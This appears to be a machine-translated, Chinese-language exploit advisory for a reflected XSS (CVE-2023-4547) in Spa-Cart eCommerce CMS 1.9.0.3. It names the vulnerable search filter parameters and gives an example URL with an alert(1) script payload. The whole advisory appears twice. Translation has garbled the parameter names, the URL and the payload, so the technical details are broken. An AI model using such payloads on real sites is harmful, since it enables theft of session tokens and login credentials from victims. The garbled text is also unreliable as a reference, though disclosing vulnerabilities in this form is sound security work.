#利用标题: Spa -Cart电子商务CMS 1.9.0.3-反映XSS
#利用作者:饼干
#日期: 20/08/2023
#vendor: spa-cart
#供应商HomePage: https://spa-cart.corm/
#软件link: https://demo.spa-cart.com/
#版本: 1.9.0.3
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-4547
#CWE: CWE-79-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /搜索
获取参数'filter [brandid]'易受XSS的攻击
获取参数'过滤器[价格]'很容易受到XSS的影响
https://website/search?过滤=1q=11load_filter=1filter [brandid]=[xss] filter [price]=[xss] filter [attr] attry] [attr] [memory] [memory] []=500%20GB
XSS有效载荷:
vnxjb'scriptAlert(1)/scriptbvu51
[-] 完毕
#利用作者:饼干
#日期: 20/08/2023
#vendor: spa-cart
#供应商HomePage: https://spa-cart.corm/
#软件link: https://demo.spa-cart.com/
#版本: 1.9.0.3
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-4547
#CWE: CWE-79-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /搜索
获取参数'filter [brandid]'易受XSS的攻击
获取参数'过滤器[价格]'很容易受到XSS的影响
https://website/search?过滤=1q=11load_filter=1filter [brandid]=[xss] filter [price]=[xss] filter [attr] attry] [attr] [memory] [memory] []=500%20GB
XSS有效载荷:
vnxjb'scriptAlert(1)/scriptbvu51
[-] 完毕
